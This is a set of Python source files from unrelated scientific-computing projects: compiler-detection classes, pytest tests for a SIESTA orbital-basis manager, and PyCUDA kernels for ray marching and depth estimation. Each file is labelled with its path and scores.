def _data_forward(self, func, x):
"""A forward pass of the model. """
x = _build_args(func, **x)
y = func(**x)
return y
def _format_eval_results(self, results):
"""Override this method to support more print formats.
:param results: dict, (str: float) is (metrics name: value)
"""
_str = ''
for metric_name, metric_result in results.items():
_str += metric_name + ': '
_str += ", ".join([str(key) + "=" + str(value) for key, value in metric_result.items()])
_str += '\n'
        return _str[:-1] | fastNLP/core/tester.py | 0.929015 | 0.394114
import os, sys, abc, re
from errand.util import which, shellcmd
class Compiler(abc.ABC):
"""Parent class for all compiler classes
"""
def __init__(self, path, flags):
self.path = path
self.flags = flags
self.version = None
def isavail(self):
if self.version is None:
self.set_version(self.get_version())
return (self.path is not None and os.path.isfile(self.path) and
self.version is not None)
def set_version(self, version):
if version and self.check_version(version):
self.version = version
@abc.abstractmethod
def get_option(self, **kwargs):
linker = kwargs.pop("linker", True)
opt = " ".join(self.flags) if self.flags else ""
if linker is False:
opt += " -c "
return opt
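        # e.g. with flags=["-O2"] and linker=False this returns "-O2 -c "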
def get_version(self):
ver = shellcmd("%s --version" % self.path).stdout.decode()
return ver.strip() if ver else None
@abc.abstractmethod
def check_version(self, version):
return False
class Cpp_Compiler(Compiler):
def __init__(self, path, flags):
super(Cpp_Compiler, self).__init__(path, flags)
class Fortran_Compiler(Compiler):
def __init__(self, path, flags):
super(Fortran_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
opt = " "
moddir = kwargs.pop("moddir", None)
if moddir:
opt = "-J %s " % moddir
return opt + super(Fortran_Compiler, self).get_option(**kwargs)
class AppleClang_Cpp_Compiler(Cpp_Compiler):
libext = "dylib"
def __init__(self, path, flags):
if path is None:
path = which("clang++")
super(AppleClang_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-dynamiclib -fPIC " + super(AppleClang_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("Apple clang version")
class Gnu_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("g++")
super(Gnu_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-shared -fPIC " + super(Gnu_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("g++ (GCC)")
class AmdClang_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("clang")
super(AmdClang_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-shared " + super(AmdClang_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("clang version") and "roc" in version
class Pgi_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("pgc++")
super(Pgi_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-shared " + super(Pgi_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("pgc++") and "PGI" in version
class CrayClang_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("CC")
if path is None:
path = which("clang++")
if path is None:
path = which("crayCC")
super(CrayClang_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-shared " + super(CrayClang_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("Cray clang version")
class IbmXl_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("xlc++")
super(IbmXl_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-shared " + super(IbmXl_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("IBM XL C/C++")
class Pthread_Gnu_Cpp_Compiler(Gnu_Cpp_Compiler):
def get_option(self, **kwargs):
return "-pthread " + super(Pthread_Gnu_Cpp_Compiler, self).get_option(**kwargs)
class Pthread_CrayClang_Cpp_Compiler(CrayClang_Cpp_Compiler):
def get_option(self, **kwargs):
return "-pthread " + super(Pthread_CrayClang_Cpp_Compiler, self).get_option(**kwargs)
class Pthread_AmdClang_Cpp_Compiler(AmdClang_Cpp_Compiler):
def get_option(self, **kwargs):
return "-pthread " + super(Pthread_AmdClang_Cpp_Compiler, self).get_option(**kwargs)
class Pthread_Pgi_Cpp_Compiler(Pgi_Cpp_Compiler):
def get_option(self, **kwargs):
return "-lpthread " + super(Pthread_Pgi_Cpp_Compiler, self).get_option(**kwargs)
class Pthread_AppleClang_Cpp_Compiler(AppleClang_Cpp_Compiler):
def get_option(self, **kwargs):
return "-lpthread " + super(Pthread_AppleClang_Cpp_Compiler,
self).get_option(**kwargs)
class OpenAcc_Gnu_Cpp_Compiler(Pthread_Gnu_Cpp_Compiler):
def __init__(self, path, flags):
super(OpenAcc_Gnu_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return ("-fopenacc " +
super(OpenAcc_Gnu_Cpp_Compiler, self).get_option(**kwargs))
def check_version(self, version):
pat = re.compile(r"(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d)+")
match = pat.search(version)
if not match:
return False
return int(match.group("major")) >= 10
class OpenAcc_CrayClang_Cpp_Compiler(Pthread_CrayClang_Cpp_Compiler):
def __init__(self, path, flags):
super(OpenAcc_CrayClang_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return ("-h pragma=acc " +
super(OpenAcc_CrayClang_Cpp_Compiler, self).get_option(**kwargs))
class OpenAcc_Pgi_Cpp_Compiler(Pthread_Pgi_Cpp_Compiler):
def __init__(self, path, flags):
super(OpenAcc_Pgi_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return ("-acc " +
super(OpenAcc_Pgi_Cpp_Compiler, self).get_option(**kwargs))
class Cuda_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("nvcc")
super(Cuda_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return ("--compiler-options '-fPIC' --shared " +
super(Cuda_Cpp_Compiler, self).get_option(**kwargs))
def check_version(self, version):
return version.startswith("nvcc: NVIDIA")
class Hip_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("hipcc")
super(Hip_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return ("-fPIC --shared " +
super(Hip_Cpp_Compiler, self).get_option(**kwargs))
def check_version(self, version):
return version.startswith("HIP version")
class Gnu_Fortran_Compiler(Fortran_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("gfortran")
super(Gnu_Fortran_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
opt = " "
return "-shared -fPIC " + opt + super(Gnu_Fortran_Compiler,
self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("GNU Fortran")
class AmdFlang_Fortran_Compiler(Fortran_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("flang")
super(AmdFlang_Fortran_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
opt = " "
return "-shared " + opt + super(AmdFlang_Fortran_Compiler,
self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("flang-new version") and "roc" in version
class Cray_Fortran_Compiler(Fortran_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("ftn")
if path is None:
path = which("crayftn")
super(Cray_Fortran_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
opt = " "
return "-shared " + opt + super(Cray_Fortran_Compiler,
self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("Cray Fortran")
class AppleGnu_Fortran_Compiler(Gnu_Fortran_Compiler):
libext = "dylib"
def check_version(self, version):
return sys.platform == "darwin" and super(AppleGnu_Fortran_Compiler,
self).check_version(version)
class IbmXl_Fortran_Compiler(Fortran_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("xlf2008_r")
if path is None:
path = which("xlf2008")
if path is None:
path = which("xlf2003_r")
if path is None:
path = which("xlf2003")
if path is None:
path = which("xlf95_r")
if path is None:
path = which("xlf95")
if path is None:
path = which("xlf90_r")
if path is None:
path = which("xlf90")
super(IbmXl_Fortran_Compiler, self).__init__(path, flags)
def get_version(self):
ver = shellcmd("%s -qversion" % self.path).stdout.decode()
return ver.strip() if ver else None
def get_option(self, **kwargs):
opt = " "
moddir = kwargs.pop("moddir", None)
if moddir:
opt = "-qmoddir=%s " % moddir
return "-qmkshrobj " + opt + super(IbmXl_Fortran_Compiler,
self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("IBM XL Fortran")
class Pgi_Fortran_Compiler(Fortran_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("pgfortran")
super(Pgi_Fortran_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
opt = " "
moddir = kwargs.pop("moddir", None)
if moddir:
opt = "-module %s " % moddir
return "-shared -fpic " + opt + super(Pgi_Fortran_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("pgfortran") and "PGI" in version
class Compilers(object):
def __init__(self, backend, compile):
self.clist = []
clist = []
if backend in ("pthread", "c++"):
clist = [Pthread_Gnu_Cpp_Compiler, Pthread_CrayClang_Cpp_Compiler,
Pthread_AmdClang_Cpp_Compiler, Pthread_Pgi_Cpp_Compiler,
Pthread_AppleClang_Cpp_Compiler]
elif backend == "cuda":
clist = [Cuda_Cpp_Compiler]
elif backend == "hip":
clist = [Hip_Cpp_Compiler]
elif backend == "openacc-c++":
clist = [OpenAcc_Gnu_Cpp_Compiler, OpenAcc_CrayClang_Cpp_Compiler,
OpenAcc_Pgi_Cpp_Compiler]
elif backend == "fortran":
clist = [AmdFlang_Fortran_Compiler, Cray_Fortran_Compiler,
Pgi_Fortran_Compiler, IbmXl_Fortran_Compiler,
AppleGnu_Fortran_Compiler, Gnu_Fortran_Compiler]
else:
raise Exception("Compiler for '%s' is not supported." % backend)
for cls in clist:
try:
if compile:
path = which(compile[0])
if path:
self.clist.append(cls(path, compile[1:]))
else:
self.clist.append(cls(None, None))
except Exception as err:
pass
def isavail(self):
return self.select_one() is not None
def select_one(self):
for comp in self.clist:
if comp.isavail():
return comp
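    # A minimal usage sketch (assumes an NVIDIA `nvcc` toolchain is on the
    # PATH; `kernel.cu` is a placeholder source file, not part of this repo):
    #
    #     compilers = Compilers("cuda", compile=None)
    #     if compilers.isavail():
    #         comp = compilers.select_one()
    #         cmd = "%s %s kernel.cu" % (comp.path, comp.get_option())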
def select_many(self):
comps = []
for comp in self.clist:
if comp.isavail():
comps.append(comp)
        return comps | errand/compiler.py | 0.468061 | 0.102305
import pytest
from aiida_siesta.utils.pao_manager import PaoManager
def test_set_from_ion(generate_ion_data):
pao_man = PaoManager()
ion = generate_ion_data('Si')
pao_man.set_from_ion(ion)
assert pao_man.name == "Si"
assert pao_man._gen_dict is not None
assert pao_man._pol_dict == {3: {1: {1: 4.0531999999999995, 2: 3.1566}}}
assert pao_man._conf_dict == {}
def test_validator_and_get_pao_block():
pao_man = PaoManager()
with pytest.raises(RuntimeError):
pao_man.get_pao_block()
pao_man.name = "Si"
with pytest.raises(RuntimeError):
pao_man.get_pao_block()
pao_man._gen_dict = {3: {0: {1: 4.05}}}
with pytest.raises(RuntimeError):
pao_man.get_pao_block()
pao_man._pol_dict = {}
assert pao_man.get_pao_block() == "Si 1\n n=3 0 1\n 7.65335"
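    # the manager stores radii in Angstrom while get_pao_block prints them
    # in Bohr (4.05 Angstrom is roughly 7.65 Bohr)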
pao_man._gen_dict = {}
with pytest.raises(RuntimeError):
pao_man.get_pao_block()
def test_confinements_features(generate_ion_data):
pao_man = PaoManager()
ion = generate_ion_data('Si_with_conf')
pao_man.set_from_ion(ion)
assert pao_man.name == "Si"
assert pao_man._gen_dict is not None
assert pao_man._pol_dict == {3: {1: {1: 4.0531999999999995, 2: 3.1566}}}
assert pao_man._conf_dict == {'Q': {3: {1: [3.0, 0.5, 0.01]}}, 'E': {3: {0: [2.0, 0.3]}}}
assert pao_man.get_pao_block() == 'Si 2\n n=3 0 2 E 2.0 0.3 \n 5.965078\t 4.419101\n n=3 1 2 P 2 Q 3.0 0.5 0.01 \n 7.659398\t 5.13417'
def test_pao_size(generate_ion_data):
pao_man = PaoManager()
ion = generate_ion_data('Si')
pao_man.set_from_ion(ion)
assert pao_man.pao_size() == "DZDP"
def test_change_all_radius():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05}}}
pao_man._pol_dict = {3: {0: {1: 4.05}}}
pao_man.change_all_radius(2)
assert pao_man._gen_dict == {3: {0: {1: 4.131}}}
assert pao_man._pol_dict == {3: {0: {1: 4.131}}}
def test_reset_radius():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05}}}
pao_man._pol_dict = {3: {0: {1: 4.05}}}
with pytest.raises(ValueError):
pao_man.reset_radius("Bohr",0.0,3,1,2)
pao_man.reset_radius("Bohr",0.0,3,0,1)
assert pao_man._gen_dict == {3: {0: {1: 0.0}}}
assert pao_man._pol_dict == {3: {0: {1: 0.0}}}
def test_add_polarization():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05}}}
pao_man._pol_dict = {3: {0: {1: 4.05}}}
with pytest.raises(ValueError):
pao_man.add_polarization(3,1)
pao_man.add_polarization(3,0)
assert pao_man._pol_dict == {3: {0: {1: 4.05, 2: 0.0}}}
assert pao_man.pao_size() == "SZDP"
def test_remove_polarization():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05}}}
pao_man._pol_dict = {3: {0: {1: 4.05, 2: 0.0}}}
with pytest.raises(ValueError):
pao_man.remove_polarization(3,1)
pao_man.remove_polarization(3,0)
assert pao_man._pol_dict == {3: {0: {1: 4.05}}}
assert pao_man.pao_size() == "SZP"
pao_man.remove_polarization(3,0)
assert pao_man._pol_dict == {}
assert pao_man.pao_size() == "SZ"
def test_add_orbital():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05}}}
pao_man._pol_dict = {3: {0: {1: 4.05}}}
with pytest.raises(ValueError):
pao_man.add_orbital("Bohr",0.0,3,1,2)
pao_man.add_orbital("Bohr",0.0,3,0,2)
assert pao_man._gen_dict == {3: {0: {1: 4.05, 2: 0.0}}}
assert pao_man.pao_size() == "DZP"
def test_remove_orbital():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05, 2: 0.0}}}
pao_man._pol_dict = {3: {0: {1: 4.05}}}
with pytest.raises(ValueError):
pao_man.remove_orbital(3,1,1)
with pytest.raises(ValueError):
pao_man.remove_orbital(3,0,1)
pao_man.remove_orbital(3,0,2)
assert pao_man._gen_dict == {3: {0: {1: 4.05}}}
assert pao_man._pol_dict == {3: {0: {1: 4.05}}}
assert pao_man.pao_size() == "SZP"
pao_man.remove_orbital(3,0,1)
assert pao_man._gen_dict == {}
assert pao_man._pol_dict == {}
def test_remove_polarization_occu(generate_ion_data):
pao_man = PaoManager()
ion = generate_ion_data('Si_with_conf')
pao_man.set_from_ion(ion)
assert pao_man._pol_occu == {3: {1: {1: 0.0, 2: 0.0}}}
pao_man.remove_polarization(3,1)
assert pao_man._pol_dict == {3: {1: {1: 4.0531999999999995}}}
assert pao_man._pol_occu == {3: {1: {1: 0.0}}}
pao_man.remove_polarization(3,1)
assert pao_man._pol_dict == {}
assert pao_man._pol_occu == {}
def test_remove_orbital_occu_and_conf(generate_ion_data):
pao_man = PaoManager()
ion = generate_ion_data('Si_with_conf')
pao_man.set_from_ion(ion)
assert pao_man._gen_occu == {3: {0: {1: 2.0, 2: 0.0}, 1: {1: 2.0, 2: 0.0}}}
assert pao_man._pol_occu == {3: {1: {1: 0.0, 2: 0.0}}}
assert pao_man._conf_dict == {'E': {3: {0: [2.0, 0.3]}}, 'Q': {3: {1: [3.0, 0.5, 0.01]}}}
pao_man.remove_orbital(3,0,2)
assert pao_man._gen_occu == {3: {0: {1: 2.0}, 1: {1: 2.0, 2: 0.0}}}
assert pao_man._pol_occu == {3: {1: {1: 0.0, 2: 0.0}}}
assert pao_man._conf_dict == {'E': {3: {0: [2.0, 0.3]}}, 'Q': {3: {1: [3.0, 0.5, 0.01]}}}
pao_man.remove_orbital(3,0,1)
assert pao_man._gen_occu == {3: {1: {1: 2.0, 2: 0.0}}}
assert pao_man._pol_occu == {3: {1: {1: 0.0, 2: 0.0}}}
assert pao_man._conf_dict == {'Q': {3: {1: [3.0, 0.5, 0.01]}}}
pao_man.remove_orbital(3,1,2)
assert pao_man._gen_occu == {3: {1: {1: 2.0}}}
assert pao_man._pol_occu == {3: {1: {1: 0.0, 2: 0.0}}}
assert pao_man._conf_dict == {'Q': {3: {1: [3.0, 0.5, 0.01]}}}
pao_man.remove_orbital(3,1,1)
assert pao_man._gen_occu == {}
assert pao_man._pol_occu == {}
    assert pao_man._conf_dict == {} | tests/utils/test_pao_manager.py | 0.632957 | 0.683268
from string import Template
import numpy as np
import pycuda.autoinit
from pycuda.compiler import SourceModule
from pycuda.gpuarray import GPUArray, to_gpu
from .utils import all_arrays_to_gpu, parse_cu_files_to_string
def batch_mvcnn_voxel_traversal_with_ray_marching(
M,
D,
N,
F,
H,
W,
padding,
bbox,
grid_shape,
sampling_scheme
):
"""Compile the CUDA kernel that given the features and the camera matrices
estimates the similarities between the features, performs the marched
voxels along its ray and does the mapping from depth planes to voxel
centers.
Arguments:
----------
M: int, maximum number of marched voxels along ray
D: int, depth planes (discretization steps)
N: int, number of views
F: int, feature size (from the Multi-View CNN)
H: int, image height
W: int, image width,
padding: int, the number of zero-padded pixels around the image to
estimate the features from the Multi-View CNN
bbox: np.array((6,), dtype=np.float32), the coordinates of the bbox
that enclose the scene
grid_shape: np.array((3,), dtype=np.int32), the dimensionality of the
voxel grid
sampling_scheme: string, specification of the sampling scheme
"""
# Set the paths to the files that will be used to construct the cuda kernel
file_paths = [
"ray_tracing.cu",
"utils.cu",
"planes_voxels_mapping.cu",
"feature_similarities.cu",
"sampling_schemes.cu"
]
cu_source_code = parse_cu_files_to_string(file_paths)
tpl = Template(cu_source_code + """
__global__ void batch_mvcnn_planes_voxels_with_ray_marching(
int n_rays,
int * ray_idxs,
float * features,
float * P,
float * P_inv,
float * camera_center,
float * voxel_grid,
int * ray_voxel_indices,
int * ray_voxel_count,
float * S_new
) {
// Compute the thread
int r = threadIdx.x + blockDim.x * blockIdx.x;
if (r >= n_rays)
return;
// Estimate the ray_start and ray_end for the current pixel
float ray_start[3], ray_end[3];
$sampling_scheme(
ray_idxs[r],
P_inv,
camera_center,
ray_start,
ray_end
);
// Compute the similarities between features
float S[$depth_planes];
compute_similarities_per_ray(
features,
P,
ray_start,
ray_end,
S
);
// Estimate the ray_voxel_indices and the ray_voxel_count
voxel_traversal(
ray_start,
ray_end,
ray_voxel_indices + r*$max_voxels*3,
ray_voxel_count + r
);
// Map the depth planes to voxel centers
planes_voxels_mapping(
voxel_grid,
ray_voxel_indices + 3*$max_voxels*r,
ray_voxel_count + r,
ray_start,
ray_end,
S,
S_new + $max_voxels*r
);
}
""")
mod = SourceModule(tpl.substitute(
max_voxels=M,
depth_planes=D,
n_views=N,
padding=padding,
features_dimensions=F,
width=W,
height=H,
grid_x=grid_shape[0],
grid_y=grid_shape[1],
grid_z=grid_shape[2],
bbox_min_x=bbox[0],
bbox_min_y=bbox[1],
bbox_min_z=bbox[2],
bbox_max_x=bbox[3],
bbox_max_y=bbox[4],
bbox_max_z=bbox[5],
sampling_scheme=sampling_scheme
))
cuda_fp = mod.get_function("batch_mvcnn_planes_voxels_with_ray_marching")
cuda_fp.prepare("i" + "P"*9)
@all_arrays_to_gpu
def fp(
ray_idxs,
features,
P,
P_inv,
camera_center,
voxel_grid,
ray_voxel_indices,
ray_voxel_count,
S_new,
threads=2048
):
# Assert everything is the right size, shape and dtype
assert S_new.shape[1] == M
assert len(ray_voxel_count.shape) == 1
assert np.float32 == S_new.dtype
assert np.int32 == ray_voxel_count.dtype
# Determine the grid and block arguments
n_rays = len(S_new)
        blocks = n_rays // threads + int(n_rays % threads != 0)
cuda_fp.prepared_call(
(threads, 1),
(blocks, 1, 1),
np.int32(n_rays),
ray_idxs.gpudata,
features.gpudata,
P.gpudata,
P_inv.gpudata,
camera_center.gpudata,
voxel_grid.gpudata,
ray_voxel_indices.gpudata,
ray_voxel_count.gpudata,
S_new.gpudata
)
return fp
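# A minimal usage sketch for the builder above (the sizes and arrays here
# are placeholders, not real data; shapes follow the docstring):
#
#     M, D, N, F, H, W, padding = 200, 32, 5, 32, 360, 640, 3
#     fp = batch_mvcnn_voxel_traversal_with_ray_marching(
#         M, D, N, F, H, W, padding,
#         bbox=np.zeros(6, dtype=np.float32),
#         grid_shape=np.array([64, 64, 32], dtype=np.int32),
#         sampling_scheme="sample_in_bbox"
#     )
#     # the returned fp(...) is then called with the per-ray GPU arrays,
#     # as in perform_mvcnn_with_ray_marching_and_voxel_mapping below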
def batch_mvcnn_voxel_traversal_with_ray_marching_with_depth_estimation(
M,
D,
N,
F,
H,
W,
padding,
bbox,
grid_shape,
sampling_scheme
):
"""Compile the CUDA kernel that given the features and the camera matrices
estimates the similarities between the features, performs the marched
voxels along its ray and does the mapping from depth planes to voxel
centers. Finally directly convert the per voxel depth distribution to a depth map
Arguments:
----------
M: int, maximum number of marched voxels along ray
D: int, depth planes (discretization steps)
N: int, number of views
F: int, feature size (from the Multi-View CNN)
H: int, image height
W: int, image width,
padding: int, the number of zero-padded pixels around the image to
estimate the features from the Multi-View CNN
bbox: np.array((6,), dtype=np.float32), the coordinates of the bbox
that enclose the scene
grid_shape: np.array((3,), dtype=np.int32), the dimensionality of the
voxel grid
sampling_scheme: string, specification of the sampling scheme
"""
# Set the paths to the files that will be used to construct the cuda kernel
file_paths = [
"ray_tracing.cu",
"utils.cu",
"planes_voxels_mapping.cu",
"feature_similarities.cu",
"sampling_schemes.cu"
]
cu_source_code = parse_cu_files_to_string(file_paths)
tpl = Template(cu_source_code + """
__global__ void batch_mvcnn_planes_voxels_with_ray_marchingi_with_depth(
int n_rays,
int * ray_idxs,
float * features,
float * P,
float * P_inv,
float * camera_center,
float * voxel_grid,
int * ray_voxel_indices,
int * ray_voxel_count,
float * S_new,
float * depth_map
) {
// Compute the thread
int r = threadIdx.x + blockDim.x * blockIdx.x;
if (r >= n_rays)
return;
// Estimate the ray_start and ray_end for the current pixel
float ray_start[3], ray_end[3];
$sampling_scheme(
ray_idxs[r],
P_inv,
camera_center,
ray_start,
ray_end
);
// Compute the similarities between features
float S[$depth_planes];
compute_similarities_per_ray(
features,
P,
ray_start,
ray_end,
S
);
// Estimate the ray_voxel_indices and the ray_voxel_count
voxel_traversal(
ray_start,
ray_end,
ray_voxel_indices + r*$max_voxels*3,
ray_voxel_count + r
);
// Map the depth planes to voxel centers
planes_voxels_mapping(
voxel_grid,
ray_voxel_indices + 3*$max_voxels*r,
ray_voxel_count + r,
ray_start,
ray_end,
S,
S_new + $max_voxels*r
);
// We need to find the voxel center with the highest probability
// based on the S_new
float * Sr = S_new + r*$max_voxels;
float max = -INFINITY;
int max_idx = 0;
for (int i=0; i<$max_voxels; i++) {
if (Sr[i] > max) {
max_idx = i;
max = Sr[i];
}
}
// Associate the voxel_center with id max_idx with a 3D point in
// world coordinates
int idx_x, idx_y, idx_z;
int dim_x = 3*$grid_y*$grid_z;
int dim_y = 3*$grid_z;
int dim_z = 3;
idx_x = ray_voxel_indices[3*$max_voxels*r + 3*max_idx];
idx_y = ray_voxel_indices[3*$max_voxels*r + 3*max_idx + 1];
idx_z = ray_voxel_indices[3*$max_voxels*r + 3*max_idx + 2];
float point[3];
for (int i=0; i<3; i++) {
point[i] = voxel_grid[idx_x*dim_x + idx_y*dim_y + idx_z*dim_z + i];
}
// Get the distance from the camera center
float sum = 0.0;
for (int i=0; i<3; i++) {
sum += pow(point[i] - camera_center[i], 2);
}
depth_map[r] = sqrt(sum);
}
""")
mod = SourceModule(tpl.substitute(
max_voxels=M,
depth_planes=D,
n_views=N,
padding=padding,
features_dimensions=F,
width=W,
height=H,
grid_x=grid_shape[0],
grid_y=grid_shape[1],
grid_z=grid_shape[2],
bbox_min_x=bbox[0],
bbox_min_y=bbox[1],
bbox_min_z=bbox[2],
bbox_max_x=bbox[3],
bbox_max_y=bbox[4],
bbox_max_z=bbox[5],
sampling_scheme=sampling_scheme
))
cuda_fp = mod.get_function("batch_mvcnn_planes_voxels_with_ray_marchingi_with_depth")
cuda_fp.prepare("i" + "P"*10)
@all_arrays_to_gpu
def fp(
ray_idxs,
features,
P,
P_inv,
camera_center,
voxel_grid,
ray_voxel_indices,
ray_voxel_count,
S_new,
depth_map,
threads=2048
):
# Assert everything is the right size, shape and dtype
assert S_new.shape[1] == M
assert len(ray_voxel_count.shape) == 1
assert np.float32 == S_new.dtype
assert np.int32 == ray_voxel_count.dtype
# Determine the grid and block arguments
n_rays = len(S_new)
        blocks = n_rays // threads + int(n_rays % threads != 0)
cuda_fp.prepared_call(
(threads, 1),
(blocks, 1, 1),
np.int32(n_rays),
ray_idxs.gpudata,
features.gpudata,
P.gpudata,
P_inv.gpudata,
camera_center.gpudata,
voxel_grid.gpudata,
ray_voxel_indices.gpudata,
ray_voxel_count.gpudata,
S_new.gpudata,
depth_map.gpudata
)
return fp
def perform_mvcnn_with_ray_marching_and_voxel_mapping(
ray_idxs,
features,
P,
P_inv,
camera_center,
bbox,
voxel_grid,
ray_voxel_indices,
ray_voxel_count,
S_new,
padding,
depth_planes,
batch_size=80000,
sampling_scheme="sample_in_bbox"
):
    # Extract the number of views (N), the maximum number of marched voxels
# (M), the depth planes (D), the image height and the image width
_, M, _ = ray_voxel_indices.shape
D = depth_planes
N, Fh, Fw, F = features.shape
H = Fh - padding - 1
W = Fw - padding - 1
# Make sure that P is a list
assert len(P) == N
    # Move to GPU to save some time from copying
features_gpu = to_gpu(features.ravel())
ray_idxs_gpu = to_gpu(ray_idxs.astype(np.int32))
P_gpu = to_gpu(np.array(P).ravel())
P_inv_gpu = to_gpu(P_inv.ravel())
camera_center_gpu = to_gpu(camera_center)
s_gpu = to_gpu(
np.zeros((batch_size, M), dtype=np.float32)
)
ray_voxel_count_gpu = to_gpu(
np.zeros((batch_size,), dtype=np.int32)
)
ray_voxel_indices_gpu = to_gpu(
np.zeros((batch_size, M, 3), dtype=np.int32)
)
fp = batch_mvcnn_voxel_traversal_with_ray_marching(
M,
D,
N,
F,
H,
W,
padding,
bbox.ravel(),
np.array(voxel_grid.shape[1:]),
sampling_scheme
)
voxel_grid = voxel_grid.transpose(1, 2, 3, 0).ravel()
    # Start iterating over the batches of rays
for i in range(0, len(ray_idxs), batch_size):
ray_voxel_indices_gpu.fill(0)
ray_voxel_count_gpu.fill(0)
s_gpu.fill(0)
fp(
ray_idxs_gpu[i:i+batch_size],
features_gpu,
P_gpu,
P_inv_gpu,
camera_center_gpu,
voxel_grid,
ray_voxel_indices_gpu,
ray_voxel_count_gpu,
s_gpu,
)
idxs = ray_idxs[i:i+batch_size]
ray_voxel_indices[idxs] = ray_voxel_indices_gpu.get()[:len(idxs)]
ray_voxel_count[idxs] = ray_voxel_count_gpu.get()[:len(idxs)]
S_new[idxs] = s_gpu.get()[:len(idxs)]
def perform_mvcnn_with_ray_marching_and_voxel_mapping_with_depth_estimation(
ray_idxs,
features,
P,
P_inv,
camera_center,
bbox,
    voxel_grid,
    M,
    padding,
    depth_planes,
batch_size=80000,
sampling_scheme="sample_in_bbox"
):
    # Extract the number of views (N), the depth planes (D), the image
    # height and the image width; M (the maximum number of marched voxels
    # along a ray) is passed in explicitly
    D = depth_planes
N, Fh, Fw, F = features.shape
H = Fh - padding - 1
W = Fw - padding - 1
# Make sure that P is a list
assert len(P) == N
    # Move to GPU to save some time from copying
features_gpu = to_gpu(features.ravel())
ray_idxs_gpu = to_gpu(ray_idxs.astype(np.int32))
P_gpu = to_gpu(np.array(P).ravel())
P_inv_gpu = to_gpu(P_inv.ravel())
camera_center_gpu = to_gpu(camera_center)
s_gpu = to_gpu(
np.zeros((batch_size, M), dtype=np.float32)
)
ray_voxel_count_gpu = to_gpu(
np.zeros((batch_size,), dtype=np.int32)
)
ray_voxel_indices_gpu = to_gpu(
np.zeros((batch_size, M, 3), dtype=np.int32)
)
depth_map = to_gpu(
        np.zeros(H*W, dtype=np.float32)
)
    fp = batch_mvcnn_voxel_traversal_with_ray_marching_with_depth_estimation(
M,
D,
N,
F,
H,
W,
padding,
bbox.ravel(),
np.array(voxel_grid.shape[1:]),
sampling_scheme
)
voxel_grid = voxel_grid.transpose(1, 2, 3, 0).ravel()
    # Start iterating over the batches of rays
for i in range(0, len(ray_idxs), batch_size):
ray_voxel_indices_gpu.fill(0)
ray_voxel_count_gpu.fill(0)
s_gpu.fill(0)
fp(
ray_idxs_gpu[i:i+batch_size],
features_gpu,
P_gpu,
P_inv_gpu,
camera_center_gpu,
voxel_grid,
ray_voxel_indices_gpu,
ray_voxel_count_gpu,
s_gpu,
depth_map
)
return depth_map.get().reshape(W, H).T | raynet/cuda_implementations/mvcnn_with_ray_marching_and_voxels_mapping.py | from string import Template
import numpy as np
import pycuda.autoinit
from pycuda.compiler import SourceModule
from pycuda.gpuarray import GPUArray, to_gpu
from .utils import all_arrays_to_gpu, parse_cu_files_to_string
def batch_mvcnn_voxel_traversal_with_ray_marching(
M,
D,
N,
F,
H,
W,
padding,
bbox,
grid_shape,
sampling_scheme
):
"""Compile the CUDA kernel that given the features and the camera matrices
estimates the similarities between the features, performs the marched
voxels along its ray and does the mapping from depth planes to voxel
centers.
Arguments:
----------
M: int, maximum number of marched voxels along ray
D: int, depth planes (discretization steps)
N: int, number of views
F: int, feature size (from the Multi-View CNN)
H: int, image height
W: int, image width,
padding: int, the number of zero-padded pixels around the image to
